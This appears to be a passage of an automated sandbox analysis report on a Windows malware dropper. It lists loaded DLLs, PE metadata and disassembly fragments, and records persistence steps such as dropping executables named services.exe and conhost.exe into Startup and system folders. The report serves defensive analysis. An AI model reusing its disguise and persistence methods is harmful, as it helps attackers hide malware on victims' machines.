                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: version.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: winmmbase.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: mmdevapi.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: devobj.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: ksuser.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: avrt.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: audioses.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: msacm32.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: midimap.dllJump to behavior
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDirectory created: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDirectory created: C:\Program Files\Microsoft\d1eeccb3e1a73cJump to behavior
                                    Source: kIdT4m0aa4.exeStatic file information: File size 4201265 > 1048576
                                    Source: kIdT4m0aa4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: kIdT4m0aa4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: kIdT4m0aa4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: kIdT4m0aa4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: kIdT4m0aa4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: kIdT4m0aa4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: kIdT4m0aa4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: kIdT4m0aa4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kIdT4m0aa4.exe
                                    Source: kIdT4m0aa4.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: kIdT4m0aa4.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: kIdT4m0aa4.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: kIdT4m0aa4.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: kIdT4m0aa4.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeFile created: C:\ProviderWebSavesNet\__tmp_rar_sfx_access_check_4221828Jump to behavior
                                    Source: kIdT4m0aa4.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDF640 push ecx; ret 0_2_00CDF653
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDEB78 push eax; ret 0_2_00CDEB96
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9BAC541D push edi; ret 4_2_00007FFD9BAC542A
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9BC64F89 push es; iretd 4_2_00007FFD9BC64F9A
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9BC64ED0 push es; iretd 4_2_00007FFD9BC64EFA
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9BD124D8 push eax; ret 4_2_00007FFD9BD124DD
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9BD124AF push eax; ret 4_2_00007FFD9BD124B0
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9BD15CB0 push edi; iretd 4_2_00007FFD9BD15CB6
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9BD124B5 push eax; ret 4_2_00007FFD9BD124B7
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9C1C845F push eax; ret 4_2_00007FFD9C1C846D
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9C1C842F pushad ; ret 4_2_00007FFD9C1C845D
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9BAD541D push edi; ret 11_2_00007FFD9BAD542A
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9BD224D8 push eax; ret 11_2_00007FFD9BD224DD
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9BD25CB0 push edi; iretd 11_2_00007FFD9BD25CB6
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9BD224AF push eax; ret 11_2_00007FFD9BD224B0
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9BD224B5 push eax; ret 11_2_00007FFD9BD224B7
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9C1D845F push eax; ret 11_2_00007FFD9C1D846D
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9C1D842F pushad ; ret 11_2_00007FFD9C1D845D
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeCode function: 17_2_00007FFD9BAA541D push edi; ret 17_2_00007FFD9BAA542A
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeCode function: 17_2_00007FFD9BAA614B push eax; iretd 17_2_00007FFD9BAA614C

                                    Persistence and Installation Behavior

                                    barindex
                                    Drops PE files with benign system names
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\bzLxRmdk.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\FxsAqTHc.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\NhTpGmEa.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\LYOHFeSO.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\vGpScIbo.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\AfbbeRiC.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\hkEDPjHT.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\vOZlGrCu.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\GcNqxydU.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\gIdVKdin.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\jBsEwaTl.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\bmSpwCMB.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\YppwRUxj.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\BpvsVBNg.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\JrdzzpEh.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\ILIJsLjp.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\tTFBRhfQ.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\aONOculH.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\ipPePSwT.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\lfFVXOxM.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\rYiuzuCB.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\WEJfKGnq.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\krBMlBBO.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\ihfMljWN.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\pVwLeLxF.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\TLuxYJBs.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\zLibuNkF.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\IQRzjLYS.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\TrDhynDR.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\mJqNRsNh.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Recovery\COBPewMCbcSeQUSyEIOt.exeJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Windows\Media\Characters\conhost.exeJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\IuBreppm.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\RIIODaxx.logJump to dropped file
